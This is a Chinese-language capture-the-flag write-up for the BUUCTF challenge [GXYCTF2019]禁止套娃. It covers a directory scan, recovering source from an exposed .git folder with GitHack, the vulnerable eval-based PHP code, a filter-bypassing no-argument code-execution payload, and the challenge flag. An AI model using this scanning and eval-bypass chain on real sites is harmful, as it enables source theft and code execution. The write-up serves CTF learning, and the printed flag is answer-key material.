提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
[GXYCTF2019]禁止套娃 1
题目
BUUCTF的[GXYCTF2019]禁止套娃 1
一、做题步骤
1.网站目录扫描
1.用dirsearch扫描网站
python dirsearch.py -u http://2c70e680-9f97-4623-87a7-1b59da3c104d.node4.buuoj.cn:81/ -e *
扫描发现git泄露
2.通过git泄露下载源码
python GitHack.py http://2c70e680-9f97-4623-87a7-1b59da3c104d.node4.buuoj.cn:81/.git/
下载了index.php文件
代码如下:
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
// echo $_GET['exp'];
@eval($_GET['exp']);
}
else{
die("还差一点哦!");
}
}
else{
die("再好好想想!");
}
}
else{
die("还想读flag,臭弟弟!");
}
}
// highlight_file(__FILE__);
?>
1.代码中过滤了很多内容
2.根据代码最后一句的提示,想到用无参数REC过滤
3.构造payload
1.用到的函数
highlight_file() 函数对文件进行语法高亮显示,本函数是show_source() 的别名
next() 输出数组中的当前元素和下一个元素的值。
array_reverse() 函数以相反的元素顺序返回数组。(主要是能返回值)
scandir() 函数返回指定目录中的文件和目录的数组。
pos() 输出数组中的当前元素的值。
localeconv() 函数返回一个包含本地数字及货币格式信息的数组,该数组的第一个元素就是"."
构造payload:
?exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));
4.获取flag
获取flag{a5613ff6-2965-4595-a837-45c5d6249d1c}